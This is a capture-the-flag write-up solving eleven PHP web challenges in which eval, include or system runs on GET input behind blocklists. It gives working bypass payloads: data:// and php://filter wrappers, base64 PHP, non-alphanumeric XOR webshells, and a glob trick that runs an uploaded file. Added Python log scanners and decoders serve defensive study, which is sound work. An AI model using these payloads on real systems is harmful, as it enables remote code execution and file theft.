AWCTF Web writeups (partial)
Author: 互联网
AWCTF -- web
web1
<?php
error_reporting(0);
if(isset($_GET['c'])){
    $c = $_GET['c'];
    // blocklist on the raw input, then eval() of whatever passes
    if(!preg_match("/flag/i", $c)){
        eval($c);
    }
}else{
    highlight_file(__FILE__);
}
c=system("cd%20..;cd%20..;cd%20..;ls;cat%20f?ag");
web2
<?php
error_reporting(0);
if(isset($_GET['c'])){
    $c = $_GET['c'];
    if(!preg_match("/flag|system|php/i", $c)){
        eval($c);
    }
}else{
    highlight_file(__FILE__);
}
system is filtered, so replace it with passthru, a function of the same family:
c=passthru("cd%20..;cd%20..;cd%20..;ls;cat%20f?ag");
web3
<?php
error_reporting(0);
if(isset($_GET['c'])){
    $c = $_GET['c'];
    if(!preg_match("/flag|system|php|cat|sort|shell|\.| |\'/i", $c)){
        eval($c);
    }
}else{
    highlight_file(__FILE__);
}
c=eval($_GET[1]);&1=system("cd%20..;cd%20..;cd%20..;ls;cat%20flag");
web4
This level additionally filters ` ; echo and (
<?php
error_reporting(0);
if(isset($_GET['c'])){
    $c = $_GET['c'];
    if(!preg_match("/flag|system|php|cat|sort|shell|\.| |\'|\`|echo|\;|\(/i", $c)){
        eval($c);
    }
}else{
    highlight_file(__FILE__);
}
c=include$_GET[1]?%3E&1=php://filter/read=convert.base64-encode/resource=/flag
web5
<?php
//flag in /flag
error_reporting(0);
if(isset($_GET['c'])){
    $c = $_GET['c'];
    // include() of user input: any supported stream wrapper is accepted
    if(!preg_match("/flag/i", $c)){
        include($c);
        // echo $flag;
    }
}else{
    highlight_file(__FILE__);
}
File inclusion: the data:// wrapper lets us execute commands. Because flag is filtered, the ? wildcard bypasses it:
?c=data://text/plain,<?php%20system("cat%20/fla?")?>
web6
<?php
// flag in /flag
error_reporting(0);
if(isset($_GET['c'])){
    $c = $_GET['c'];
    if(!preg_match("/flag|php|file/i", $c)){
        include($c);
        // echo $flag;
    }
}else{
    highlight_file(__FILE__);
}
php is filtered too, so encode the payload in base64:
?c=data://text/plain;base64,PD9waHAgc3lzdGVtKCdjYXQgL2ZsYWcnKTs/Pg==
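The web1 to web6 payloads above all travel in a GET parameter, so they are easy to spot in access logs once the value is percent-decoded and any base64 body of a data: URI is decoded as well. The following Python scanner is an example added to this writeup, not code from the challenge; the log lines, client address, timestamps and paths in it are constructed. It flags the stream-wrapper schemes (php://, data://), the nested $_GET[...] trick from web3/web4, calls to command-execution functions, and PHP open tags.

```python
import base64
import re
from urllib.parse import unquote

# Constructed access-log lines shaped like the web1-web6 requests above
# (hypothetical client address, time and paths; not captured traffic).
SAMPLE_LOG = """\
10.0.0.5 - - [01/Feb/2021:10:00:01 +0800] "GET /web1/?c=system(%22cd%20..;ls;cat%20f?ag%22); HTTP/1.1" 200 512
10.0.0.5 - - [01/Feb/2021:10:00:02 +0800] "GET /web4/?c=include$_GET[1]?%3E&1=php://filter/read=convert.base64-encode/resource=/flag HTTP/1.1" 200 88
10.0.0.5 - - [01/Feb/2021:10:00:03 +0800] "GET /web6/?c=data://text/plain;base64,PD9waHAgc3lzdGVtKCdjYXQgL2ZsYWcnKTs/Pg== HTTP/1.1" 200 44
10.0.0.9 - - [01/Feb/2021:10:00:04 +0800] "GET /index.php?page=about HTTP/1.1" 200 2048
"""

REQUEST_LINE = re.compile(r'"(?:GET|POST) (\S+) HTTP/')
DATA_URI_B64 = re.compile(r"data://[^,]*;base64,([A-Za-z0-9+/=]+)", re.I)

# Each indicator is applied to the decoded value of every query parameter.
INDICATORS = (
    ("php-wrapper", re.compile(r"\b(?:php|data)://", re.I)),
    ("exec-function", re.compile(r"\b(?:system|passthru|exec|shell_exec|popen|eval)\s*\(", re.I)),
    ("nested-param", re.compile(r"\$_(?:GET|POST|REQUEST)\[", re.I)),
    ("php-open-tag", re.compile(r"<\?php", re.I)),
)


def decode_value(raw):
    """Percent-decode a parameter and, for a base64 data: URI, append its decoded body so
    the indicators also see code hidden inside the wrapper (web6 style). unquote() is
    used rather than unquote_plus() so that a '+' inside base64 survives."""
    text = unquote(raw)
    m = DATA_URI_B64.search(text)
    if m:
        try:
            text += " " + base64.b64decode(m.group(1), validate=True).decode("utf-8", "replace")
        except ValueError:
            pass  # not valid base64: leave the raw text for the indicators
    return text


def query_params(target):
    """Split 'path?a=1&b=2' into (name, raw_value) pairs; only '&' separates pairs,
    so the ';' inside a data: URI (web6) stays part of the value."""
    query = target.partition("?")[2]
    return [pair.partition("=")[::2] for pair in query.split("&") if pair]


def scan_request(target):
    """Return the sorted indicator names triggered by one request target."""
    hits = set()
    for _name, raw in query_params(target):
        decoded = decode_value(raw)
        for label, pattern in INDICATORS:
            if pattern.search(decoded):
                hits.add(label)
    return sorted(hits)


def scan_log(log_text):
    """Map every request target in the log to its triggered indicators ([] when clean)."""
    results = {}
    for line in log_text.splitlines():
        m = REQUEST_LINE.search(line)
        if m:
            results[m.group(1)] = scan_request(m.group(1))
    return results


if __name__ == "__main__":
    for target, hits in scan_log(SAMPLE_LOG).items():
        print(("ALERT " if hits else "ok    ") + target, hits)
```

The decoding step matters more than the patterns: the web6 request carries no readable PHP at all until the base64 body is decoded, and the web4 request hides php://filter in a second parameter that a check on c alone never sees.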
web7 (not solved yet)
<?php
if(isset($_GET['c'])){
    $c = $_GET['c'];
    if(!preg_match("/[0-9]|\~|\`|\@|\#|\\$|\%|\^|\&|\*|\（|\）|\-|\=|\+|\{|\[|\]|\}|\:|\'|\"|\,|\<|\.|\>|\/|\?|\\\\/i", $c)){
        eval($c);
    }
}else{
    highlight_file(__FILE__);
}
See https://www.freebuf.com/articles/web/261800.html (note that the two parentheses in the blocklist are full-width characters, so ASCII ( and ) are not filtered).
print_r(scandir(next(scandir(getcwd()))));
Reads the parent directory (www).
print_r(scandir(dirname(getcwd())));
Same as above.
print_r(scandir(next(scandir(dirname(chdir(dirname(getcwd())))))));
Reads the var directory.
print_r(scandir(chr(ord(strrev(crypt(serialize(array())))))));
Reads a random directory.
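Why the web7 blocklist lets print_r(scandir(...)) through: the two parentheses in it are the full-width characters U+FF08 and U+FF09, and ; and _ are not listed at all. The Python below is an example added to this writeup (not the challenge's code) that transcribes the blocklist as the regex engine sees it, shows the payloads above passing it while a corrected ASCII version rejects them, and contrasts that with an allowlist dispatcher that never evaluates user input. The corrected regex and the action names are hypothetical.

```python
import os
import re

# The web7 blocklist as the regex engine sees it, transcribed from the challenge source above.
# The two parentheses inside it are the FULL-WIDTH characters U+FF08 and U+FF09, so ASCII
# ( and ) are not matched, and neither are _ and ; (they were never listed).
WEB7_BLOCKLIST = re.compile(r"[0-9]|[~`@#$%^&*（）\-=+{\[\]}:'\",<.>/?\\]", re.I)

# Hypothetical corrected blocklist (not from the challenge): ASCII ( ) ; _ added.
WEB7_BLOCKLIST_FIXED = re.compile(r"[0-9]|[~`@#$%^&*（）()\-=+{\[\]}:'\",<.>/?\\;_]", re.I)


def reaches_eval(blocklist, payload):
    """True when the blocklist lets the payload through to eval()."""
    return blocklist.search(payload) is None


def non_ascii_in_pattern(pattern):
    """Characters above 0x7F in a regex source: a quick review check for look-alike typos."""
    return [c for c in pattern.pattern if ord(c) > 0x7F]


# The control that actually removes the risk: no eval at all, only named actions.
ALLOWED_ACTIONS = {
    "list_cwd": lambda: sorted(os.listdir(".")),
    "cwd": os.getcwd,
}


def run_action(name):
    """Dispatch on an allowlisted action name; anything else is rejected (returns None)."""
    action = ALLOWED_ACTIONS.get(name)
    return action() if action else None


if __name__ == "__main__":
    for payload in ("print_r(scandir(getcwd()));", "print_r(scandir('/'));"):
        print(payload, "->",
              "reaches eval" if reaches_eval(WEB7_BLOCKLIST, payload) else "blocked",
              "/ fixed:", "reaches eval" if reaches_eval(WEB7_BLOCKLIST_FIXED, payload) else "blocked")
    print("non-ASCII in blocklist:", non_ascii_in_pattern(WEB7_BLOCKLIST))
```

Even the corrected blocklist is only a patch on the real defect, which is eval() on request data; the allowlist dispatcher at the end is the shape the handler should have.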
web8
<?php
if(isset($_GET['c'])){
    $c=$_GET['c'];
    // user input goes straight to the shell; only the output is redirected away
    system($c." >/dev/null 2>&1");
}else{
    highlight_file(__FILE__);
}
Appending >/dev/null 2>&1 discards the command's output, so nothing is echoed back (see https://www.cnblogs.com/tinywan/p/6025468.html). The ; at the end of the payload terminates the cat command, so the redirection only applies to the empty command after it:
?c=cat /flag;
web9
<?php
highlight_file(__FILE__);
header("Content-type:text/html;charset=utf-8");
error_reporting(0);
if(preg_match('/[a-z0-9]/is',$_GET['shell'])){
    echo "hacker!!!";
}else{
    eval($_GET['shell']);
}
?>
Webshell without letters or digits.
See https://www.leavesongs.com/PENETRATION/webshell-without-alphanum.html
?shell=$_="`{{{"^"?<>/";${$_}[_](${$_}[__]);&_=assert&__=print_r(scandir('/'))
?shell=$_="`{{{"^"?<>/";${$_}[_]();&_=phpinfo
?shell=$__=('>'>'<')+('>'>'<');$_=$__/$__;$____='';$___="瞰";$____.=~($___{$_});$___="和";$____.=~($___{$__});$___="和";$____.=~($___{$__});$___="的";$____.=~($___{$_});$___="半";$____.=~($___{$_});$___="始";$____.=~($___{$__});$_____='_';$___="俯";$_____.=~($___{$__});$___="瞰";$_____.=~($___{$__});$___="次";$_____.=~($___{$_});$___="站";$_____.=~($___{$_});$_=$$_____;$____($_[$__]);
POST data: 2=system("cat /flag");
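What the three web9 payloads evaluate to is easier to see once the two tricks are decoded. PHP's string XOR gives "`{{{"^"?<>/" = _GET, so ${$_}[_](${$_}[__]) is $_GET['_']($_GET['__']), i.e. the function name and its argument arrive in two extra parameters that the [a-z0-9] check never looks at. Payload 3 instead builds assert and _POST by taking the bitwise NOT of single bytes of UTF-8 characters ($___{$_} is a PHP 7 byte offset; the {} offset syntax was removed in PHP 8, while ~ on strings still works). The Python below is a decoding helper added to this writeup, not the challenge's or the referenced article's code; it reproduces the two operations and recovers the identifiers, which is the step an analyst needs when such a payload shows up in a log.

```python
# Decoding helpers for the non-alphanumeric web9 payloads above.
# Added for this writeup; not part of the challenge or of the referenced article.

def php_string_xor(a, b):
    """Emulate PHP's "str" ^ "str": byte-wise XOR, truncated to the shorter operand."""
    return bytes(x ^ y for x, y in zip(a.encode("latin-1"), b.encode("latin-1"))).decode("latin-1")


def php_not_byte(text, index):
    """Emulate PHP 7's ~($str{$i}) (or ~$str[$i]): bitwise NOT of one byte of the string.
    PHP indexes strings by byte, so a three-byte UTF-8 character has offsets 0, 1 and 2."""
    return chr((~text.encode("utf-8")[index]) & 0xFF)


# PHP: $__ = ('>'>'<') + ('>'>'<');  two true values added give 2
#      $_  = $__ / $__;              gives 1
TWO = int(">" > "<") + int(">" > "<")
ONE = TWO // TWO

# The (character, byte offset) pairs from payload 3, in the order they are concatenated.
FUNCTION_PIECES = [("瞰", ONE), ("和", TWO), ("和", TWO), ("的", ONE), ("半", ONE), ("始", TWO)]
VARIABLE_PIECES = [("俯", TWO), ("瞰", TWO), ("次", ONE), ("站", ONE)]


def decode_not_pieces(pieces, prefix=""):
    """Rebuild the string that the chain of ~($str{$i}) concatenations produces."""
    return prefix + "".join(php_not_byte(ch, idx) for ch, idx in pieces)


def decode_web9_payloads():
    """Return the hidden identifiers behind the three payloads."""
    return {
        # payloads 1 and 2: the string assigned to $_, then used as ${$_} (variable variable)
        "xor_variable": php_string_xor("`{{{", "?<>/"),
        # payload 3: $____ (the function called) and $_____ (the superglobal name)
        "not_function": decode_not_pieces(FUNCTION_PIECES),
        "not_variable": decode_not_pieces(VARIABLE_PIECES, prefix="_"),
    }


if __name__ == "__main__":
    for name, value in decode_web9_payloads().items():
        print(f"{name}: {value}")
```

With the identifiers recovered, payload 3 reads as assert($_POST[2]), which is why the command is supplied in the POST body rather than in the filtered shell parameter.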
web10
<?php
if(isset($_GET['c'])){
    $c=$_GET['c'];
    // letters, digits and most shell metacharacters are blocked, but not . ? [ ] / or space
    if(!preg_match("/\;|[a-z]|[0-9]|\\$|\(|\{|\'|\"|\`|\%|\x09|\x26|\>|\</i", $c)){
        system($c);
    }
}else{
    highlight_file(__FILE__);
}
See the article at https://www.leavesongs.com/PENETRATION/webshell-without-alphanum-advanced.html
POST a file to the target; while it is being uploaded, execute it with . (the dot, i.e. the shell's source command).
Create a new page that POSTs the data to the target:
<!DOCTYPE html>
<html lang="en">
<head>
    <meta charset="UTF-8">
    <meta name="viewport" content="width=device-width, initial-scale=1.0">
    <title>POST数据包POC</title>
</head>
<body>
    <form action="http://49.232.149.138:10031/" method="post" enctype="multipart/form-data">
        <!-- the action URL is the link of the challenge instance currently open -->
        <label for="file">文件名:</label>
        <input type="file" name="file" id="file"><br>
        <input type="submit" name="submit" value="提交">
    </form>
</body>
</html>
The uploaded file contains:
#!/bin/sh
cat /flag
Finally, build the PoC: ?c=.+/???/????????[@-[]
(The trailing [@-[] is a Linux glob character class; it matches the uppercase letters.)
Run it to get the flag (the uploaded temp file does not always get an uppercase character in its name, so upload several times).
web11
<?php
if(isset($_GET['c'])){
    $c=$_GET['c'];
    if(!preg_match("/\;|[a-z]|\`|\%|\x09|\x26|\>|\</i", $c)){
        system($c);
    }
}else{
    highlight_file(__FILE__);
}
Same method as above.
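The web10/web11 payload works entirely through shell glob expansion: /???/ expands to /tmp/, and ????????[@-[] to a nine-character name whose last character lies in the ASCII range from @ to [ (that is @, A to Z and [), which is why only uploads whose temp name ends in an uppercase letter get picked up. The Python below is an example added to this writeup (not the challenge's code; the sample file names are constructed, and it assumes POSIX sh semantics for ?, * and [a-b]) that translates that glob subset, lists what [@-[] accepts, and gives a detection rule for a command parameter made only of glob characters.

```python
import re


def glob_to_regex(pattern):
    """Translate ?, *, [...] ranges and literals into an anchored regex for one path.
    Written for this example; it is not the shell's own matcher."""
    out = []
    i = 0
    while i < len(pattern):
        ch = pattern[i]
        if ch == "?":
            out.append("[^/]")            # any single character except the path separator
        elif ch == "*":
            out.append("[^/]*")
        elif ch == "[":
            j = pattern.index("]", i + 1)  # raises ValueError on an unterminated class
            body = pattern[i + 1:j]
            negate = body.startswith("!")
            if negate:
                body = body[1:]
            # escape regex-significant characters inside the class, keep '-' so ranges work
            body = "".join("\\" + c if c in "\\]^[" else c for c in body)
            out.append("[" + ("^" if negate else "") + body + "]")
            i = j
        else:
            out.append(re.escape(ch))
        i += 1
    return re.compile("^" + "".join(out) + "$")


def glob_matches(pattern, path):
    return glob_to_regex(pattern).match(path) is not None


def class_members(char_class):
    """Every ASCII character a bracket expression such as [@-[] accepts."""
    return "".join(c for c in map(chr, range(128)) if glob_matches(char_class, c))


PAYLOAD_GLOB = "/???/????????[@-[]"

# Constructed names in the shape PHP gives upload temp files ("php" + 6 random characters).
SAMPLE_PATHS = ["/tmp/phpAb3xQZ", "/tmp/php9kq2Ls", "/tmp/phpXyzzyA", "/etc/passwd"]


def matching_paths(paths, pattern=PAYLOAD_GLOB):
    """The paths the shell would substitute for the pattern: only those ending in @, A-Z or [."""
    return [p for p in paths if glob_matches(pattern, p)]


ALNUM = re.compile(r"[A-Za-z0-9]")
GLOB_META = re.compile(r"[?*\[]")


def glob_only_command(cmd):
    """Detection rule: a command parameter with no letters or digits at all but with glob
    metacharacters is a filter bypass attempt, not a command anyone types by hand."""
    return ALNUM.search(cmd) is None and GLOB_META.search(cmd) is not None


if __name__ == "__main__":
    print("[@-[] accepts:", class_members("[@-[]"))
    print("expansion of", PAYLOAD_GLOB, "->", matching_paths(SAMPLE_PATHS))
    print("glob-only:", glob_only_command(". /???/????????[@-[]"))
```

Two of the four constructed names match, which illustrates the retry note above: the pattern only selects an upload whose temp name happens to end in the uppercase range. On the defensive side, a request whose command parameter triggers glob_only_command is the signature of exactly this bypass, and system() on request data is the defect to remove.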
Source: https://www.cnblogs.com/chenxianz/p/14341238.html